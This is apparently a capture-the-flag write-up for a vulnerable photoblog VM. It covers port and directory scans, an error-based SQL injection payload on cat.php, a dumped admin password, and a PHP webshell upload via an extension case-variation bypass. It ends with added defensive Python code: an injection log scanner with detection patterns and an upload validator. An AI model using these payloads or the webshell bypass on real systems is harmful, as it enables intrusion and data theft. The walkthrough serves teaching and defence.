Information gathering
Port scan
# nmap -p- -sC -sV 192.168.111.141 -oA scans/allport
Nmap scan report for 192.168.111.141
Host is up (0.00043s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 5.5p1 Debian 6+squeeze2 (protocol 2.0)
| ssh-hostkey:
| 1024 f8:4a:f0:61:f1:00:51:74:35:6b:2d:48:97:47:1c:84 (DSA)
|_ 2048 e3:91:77:99:64:b6:cd:45:71:d1:6c:55:42:c6:43:55 (RSA)
80/tcp open http Apache httpd 2.2.16 ((Debian))
|_http-server-header: Apache/2.2.16 (Debian)
|_http-title: My Photoblog - last picture
MAC Address: 00:0C:29:3C:74:CE (VMware)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Directory brute-forcing
# dirb http://192.168.111.141
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Fri Jul 3 20:50:38 2020
URL_BASE: http://192.168.111.141/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.111.141/ ----
==> DIRECTORY: http://192.168.111.141/admin/
+ http://192.168.111.141/all (CODE:200|SIZE:2022)
+ http://192.168.111.141/cat (CODE:200|SIZE:1858)
+ http://192.168.111.141/cgi-bin/ (CODE:403|SIZE:291)
==> DIRECTORY: http://192.168.111.141/classes/
==> DIRECTORY: http://192.168.111.141/css/
+ http://192.168.111.141/footer (CODE:200|SIZE:185)
+ http://192.168.111.141/header (CODE:200|SIZE:796)
==> DIRECTORY: http://192.168.111.141/images/
+ http://192.168.111.141/index (CODE:200|SIZE:1343)
+ http://192.168.111.141/index.php (CODE:200|SIZE:1343)
+ http://192.168.111.141/server-status (CODE:403|SIZE:296)
+ http://192.168.111.141/show (CODE:200|SIZE:1320)
---- Entering directory: http://192.168.111.141/admin/ ----
+ http://192.168.111.141/admin/del (CODE:302|SIZE:0)
+ http://192.168.111.141/admin/footer (CODE:200|SIZE:19)
+ http://192.168.111.141/admin/header (CODE:200|SIZE:686)
+ http://192.168.111.141/admin/index (CODE:302|SIZE:0)
+ http://192.168.111.141/admin/index.php (CODE:302|SIZE:0)
+ http://192.168.111.141/admin/login (CODE:200|SIZE:1387)
+ http://192.168.111.141/admin/logout (CODE:302|SIZE:0)
+ http://192.168.111.141/admin/new (CODE:302|SIZE:0)
==> DIRECTORY: http://192.168.111.141/admin/uploads/
---- Entering directory: http://192.168.111.141/classes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.111.141/css/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.111.141/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.111.141/admin/uploads/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
Directory listing is enabled on several directories (dirb flags them as LISTABLE).
Front-end SQL injection
Clicking around the site, there is an SQL injection that can be exploited with error-based injection.
Visiting /cat.php?id=1 AND (EXTRACTVALUE(1,CONCAT(0x7C,@@basedir,0x7C))) returns:
XPATH syntax error: '|/usr/|'
Union-based injection also works.
There are 4 columns, and the second one is reflected in the page. sqlmap can take it from here in one go, but injecting by hand is a good way to get familiar with the commands.
Obtaining the administrator password
Database: photoblog
Table: users
[1 entry]
+------+-------+---------------------------------------------+
| id | login | password |
+------+-------+---------------------------------------------+
| 1 | admin | 8efe310f9ab3efeae8d410a8e0166eb2 (P4ssw0rd) |
+------+-------+---------------------------------------------+
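As an added defender-side example that is not part of the original writeup, the following Python script scans Apache access-log lines for the error-based (EXTRACTVALUE) and union-based injection patterns used above, URL-decoding the query string repeatedly so that double-encoded payloads are not missed. The log lines are constructed for the example; the host 192.168.111.141 and the /cat.php path come from the page, while the signature list, the regular expressions and the function names are my own assumptions.

```python
import re
from urllib.parse import unquote_plus, urlsplit

# Constructed sample access-log lines (Apache combined format); only the host
# and the /cat.php path are taken from the writeup, everything else is made up.
SAMPLE_LOG = """\
192.168.111.1 - - [03/Jul/2020:20:55:01 +0800] "GET /cat.php?id=1 HTTP/1.1" 200 1858 "-" "Mozilla/5.0"
192.168.111.1 - - [03/Jul/2020:20:55:09 +0800] "GET /cat.php?id=1%20AND%20(EXTRACTVALUE(1,CONCAT(0x7C,@@basedir,0x7C))) HTTP/1.1" 200 1342 "-" "Mozilla/5.0"
192.168.111.1 - - [03/Jul/2020:20:55:40 +0800] "GET /cat.php?id=1+UNION+SELECT+1,login,password,4+FROM+users HTTP/1.1" 200 1402 "-" "sqlmap/1.4"
192.168.111.1 - - [03/Jul/2020:20:56:02 +0800] "GET /show.php?id=5 HTTP/1.1" 200 1320 "-" "Mozilla/5.0"
192.168.111.1 - - [03/Jul/2020:20:56:30 +0800] "GET /cat.php?id=1%2527%2520or%25201%253D1 HTTP/1.1" 200 1858 "-" "Mozilla/5.0"
"""

# Apache combined log format: ip ident user [time] "method target proto" status size "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3}) (?P<size>\S+) '
    r'"(?P<ref>[^"]*)" "(?P<ua>[^"]*)"'
)

# Signatures are matched against the fully decoded query string (case-insensitive).
SIGNATURES = [
    ("error-based (extractvalue/updatexml)", re.compile(r"\b(extractvalue|updatexml)\s*\(", re.I)),
    ("union-based", re.compile(r"\bunion\b[\s/*]+(all[\s/*]+)?select\b", re.I)),
    ("server variable read", re.compile(r"@@\w+")),
    ("tautology", re.compile(r"\bor\b\s+\d+\s*=\s*\d+", re.I)),
]


def decode_fully(value, rounds=3):
    """URL-decode until the string stops changing (bounded), so %2527 -> %27 -> ' is seen."""
    for _ in range(rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value


def scan_log(text):
    """Return one finding per request whose decoded query string matches a signature."""
    findings = []
    for line in text.splitlines():
        match = LOG_RE.match(line)
        if not match:
            continue  # malformed or non-combined-format line; skip rather than crash
        parts = urlsplit(match.group("target"))
        if not parts.query:
            continue
        decoded = decode_fully(parts.query)
        hits = [name for name, rx in SIGNATURES if rx.search(decoded)]
        if hits:
            findings.append({
                "ip": match.group("ip"),
                "time": match.group("ts"),
                "path": parts.path,
                "query": decoded,
                "signatures": hits,
                "user_agent": match.group("ua"),
            })
    return findings


if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(f"{finding['time']} {finding['ip']} {finding['path']} "
              f"{', '.join(finding['signatures'])} :: {finding['query']}")
```

Run against a real access log by reading the file into `scan_log`; the decode loop is bounded to three rounds so a log line cannot make the scanner spin, and signatures are deliberately narrow (a bare `or` or `select` in a search box would otherwise flood the output).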
Back-end file upload
After logging in to the admin panel, upload an image whose contents are a PHP webshell, and use Burp to change the extension to Php (case-variation bypass).
Then connect with AntSword to get a shell.
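As an added example that is not part of the original writeup, here is a server-side upload validator written in Python that closes the case-variation bypass used above: extensions are compared lower-cased and in every position of the name, the image type is taken from the file's magic bytes rather than from the client's filename, and the stored name is generated by the server. The function names, the extension lists and the sample inputs are my own assumptions, not code from the photoblog application.

```python
import os
import secrets

# Magic bytes of the image formats a photoblog should accept.
IMAGE_SIGNATURES = {
    b"\xff\xd8\xff": "jpg",
    b"\x89PNG\r\n\x1a\n": "png",
    b"GIF87a": "gif",
    b"GIF89a": "gif",
}
ALLOWED_EXTENSIONS = {"jpg", "jpeg", "png", "gif"}
# Extensions a mod_php setup may hand to the interpreter; compared lower-cased and in
# every position of the name, so "x.Php" and "x.php.jpg" are both refused.
EXECUTABLE_EXTENSIONS = {"php", "php3", "php4", "php5", "php7", "phtml", "phar"}


class UploadRejected(ValueError):
    """Raised with a short reason when an upload fails validation."""


def extension_parts(filename):
    """Return every dot-separated suffix of the base name, lower-cased."""
    base = os.path.basename(filename.replace("\\", "/"))
    return [part.lower() for part in base.split(".")[1:]]


def detect_image_type(content):
    """Identify the image type from the leading bytes, not from the client's name."""
    for magic, ext in IMAGE_SIGNATURES.items():
        if content.startswith(magic):
            return ext
    return None


def validate_upload(filename, content):
    """Validate an upload and return the server-chosen name to store it under."""
    if not filename or any(ord(ch) < 32 for ch in filename):
        raise UploadRejected("invalid characters in file name")  # e.g. null-byte tricks
    parts = extension_parts(filename)
    if not parts:
        raise UploadRejected("no extension")
    if any(part in EXECUTABLE_EXTENSIONS for part in parts):
        raise UploadRejected("executable extension")
    if parts[-1] not in ALLOWED_EXTENSIONS:
        raise UploadRejected("extension not allowed")
    detected = detect_image_type(content)
    if detected is None:
        raise UploadRejected("content is not a supported image")
    # Defence in depth: a valid image header does not rule out an appended script.
    if b"<?php" in content or b"<?=" in content:
        raise UploadRejected("embedded php tag")
    # The stored name is random and its extension comes from the detected content,
    # so nothing the client supplied ever reaches the filesystem.
    return f"{secrets.token_hex(16)}.{detected}"


def rejection_reason(filename, content):
    """Convenience wrapper: None when the upload is accepted, else the reason."""
    try:
        validate_upload(filename, content)
    except UploadRejected as exc:
        return str(exc)
    return None


if __name__ == "__main__":
    # Constructed inputs: a minimal PNG header and the renamed-script case from the writeup.
    png = b"\x89PNG\r\n\x1a\n" + b"\x00" * 32
    print("Holiday.PNG ->", validate_upload("Holiday.PNG", png))
    print("shell.Php   ->", rejection_reason("shell.Php", b"<?php /* test */ ?>"))
```

The validator is only half of the fix: the uploads directory should also be served with PHP execution disabled (or from outside the document root), so that even a file that slips past the checks is delivered as static content rather than run.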